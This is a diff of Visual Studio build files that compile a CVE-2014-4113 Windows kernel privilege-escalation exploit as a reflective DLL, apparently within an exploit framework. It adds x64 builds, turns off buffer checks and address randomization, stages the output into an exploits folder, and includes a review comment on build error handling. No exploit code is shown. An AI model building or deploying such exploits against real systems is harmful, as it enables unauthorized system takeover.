<FunctionLevelLinking>true</FunctionLevelLinking>
|
<AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
|
||||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE_2014_4113_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||||
<CompileAs>Default</CompileAs>
|
<StringPooling>true</StringPooling>
|
||||||
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
|
||||||
|
<FunctionLevelLinking>false</FunctionLevelLinking>
|
||||||
|
<PrecompiledHeader>
|
||||||
|
</PrecompiledHeader>
|
||||||
|
<AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
|
||||||
|
<ObjectFileName>$(OutDir)\</ObjectFileName>
|
||||||
|
<ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
|
||||||
|
<WarningLevel>Level3</WarningLevel>
|
||||||
|
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
|
||||||
|
<BufferSecurityCheck>false</BufferSecurityCheck>
|
||||||
|
<FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
|
||||||
|
<TreatWarningAsError>true</TreatWarningAsError>
|
||||||
</ClCompile>
|
</ClCompile>
|
||||||
<Link>
|
<Link>
|
||||||
|
<AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
|
||||||
|
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
|
||||||
|
<IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
|
||||||
|
<IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
|
||||||
|
<DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
|
||||||
<GenerateDebugInformation>false</GenerateDebugInformation>
|
<GenerateDebugInformation>false</GenerateDebugInformation>
|
||||||
<OptimizeReferences>true</OptimizeReferences>
|
<GenerateMapFile>true</GenerateMapFile>
|
||||||
<OutputFile>$(OutDir)$(TargetName).$(ProcessorArchitecture)$(TargetExt)</OutputFile>
|
<MapFileName>$(OutDir)\cve-2014-4113.map</MapFileName>
|
||||||
|
<SubSystem>Windows</SubSystem>
|
||||||
|
<OptimizeReferences>
|
||||||
|
</OptimizeReferences>
|
||||||
|
<EnableCOMDATFolding>
|
||||||
|
</EnableCOMDATFolding>
|
||||||
|
<RandomizedBaseAddress>false</RandomizedBaseAddress>
|
||||||
|
<DataExecutionPrevention>
|
||||||
|
</DataExecutionPrevention>
|
||||||
|
<ImportLibrary>$(OutDir)\cve-2014-4113.lib</ImportLibrary>
|
||||||
|
<Profile>false</Profile>
|
||||||
|
<ModuleDefinitionFile>
|
||||||
|
</ModuleDefinitionFile>
|
||||||
|
<AdditionalOptions>/ignore:4070</AdditionalOptions>
|
||||||
</Link>
|
</Link>
|
||||||
|
<PostBuildEvent>
|
||||||
|
<Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.01 "$(TargetDir)$(TargetFileName)" > NUL
|
||||||
|
IF EXIST "..\..\..\..\..\data\exploits\CVE-2014-4113\" GOTO COPY
|
||||||
|
mkdir "..\..\..\..\..\data\exploits\CVE-2014-4113\"
|
||||||
|
:COPY
|
||||||
|
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2014-4113\"</Command>
|
||||||
|
</PostBuildEvent>
|
||||||
</ItemDefinitionGroup>
|
</ItemDefinitionGroup>
|
||||||
<ItemGroup>
|
<ItemGroup>
|
||||||
<ClCompile Include="cve-2014-4113.c" />
|
<ClCompile Include="cve-2014-4113.c" />
|
||||||
</ItemGroup>
|
</ItemGroup>
|
||||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||||
<ImportGroup Label="ExtensionTargets">
|
<ImportGroup Label="ExtensionTargets">
|
||||||
|
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
|
||||||
</ImportGroup>
|
</ImportGroup>
|
||||||
</Project>
|
</Project>
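Review bot: The Release post-build commands copy the DLL into `..\..\..\..\..\data\exploits\CVE-2014-4113\` without checking whether `editbin.exe` succeeded. Its output is redirected to `NUL` and nothing tests its exit status before the `copy /y`, so a binary whose header was never adjusted could be staged silently (assuming the build only reports the status of the last command in the block). Adding `IF ERRORLEVEL 1 EXIT /B 1` directly after the `editbin.exe` line in both Release configurations would surface the failure; the Debug configurations hide it the same way by ending with `exit 0`. Separately, Release|x64 passes `/SUBSYSTEM:WINDOWS,5.01` while Debug|x64 and both Win32 configurations pass `4.0`, which looks unintentional and should be aligned or explained in a comment.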
|
|
@ -4,14 +4,15 @@
|
||||||
<SolutionPath>.\cve-2014-4113.sln</SolutionPath>
|
<SolutionPath>.\cve-2014-4113.sln</SolutionPath>
|
||||||
</PropertyGroup>
|
</PropertyGroup>
|
||||||
|
|
||||||
<Target Name="all" DependsOnTargets="x86" />
|
<Target Name="all" DependsOnTargets="x86;x64" />
|
||||||
|
|
||||||
<Target Name="x86">
|
<Target Name="x86">
|
||||||
<Message Text="Building CVE-2014-4113 win32k_null_page x86 Release version" />
|
<Message Text="Building CVE-2014-4113 track_popup_menu x86 Release version" />
|
||||||
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
|
||||||
</Target>
|
</Target>
|
||||||
|
|
||||||
<Target Name="x64">
|
<Target Name="x64">
|
||||||
<Message Text="CVE-2014-4113 is not supported in x64" />
|
<Message Text="Building CVE-2014-4113 track_popup_menu x64 Release version" />
|
||||||
|
<MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=x64" Targets="Clean;Rebuild"/>
|
||||||
</Target>
|
</Target>
|
||||||
</Project>
|
</Project>
|
||||||
|
|
|
@ -48,7 +48,7 @@ IF "%ERRORLEVEL%"=="0" (
|
||||||
)
|
)
|
||||||
|
|
||||||
IF "%ERRORLEVEL%"=="0" (
|
IF "%ERRORLEVEL%"=="0" (
|
||||||
ECHO "Building CVE-2014-4113 (win32k_null_page)"
|
ECHO "Building CVE-2014-4113 (track_popup_menu)"
|
||||||
PUSHD CVE-2014-4113
|
PUSHD CVE-2014-4113
|
||||||
msbuild.exe make.msbuild /target:%PLAT%
|
msbuild.exe make.msbuild /target:%PLAT%
|
||||||
POPD
|
POPD
|
||||||
|
|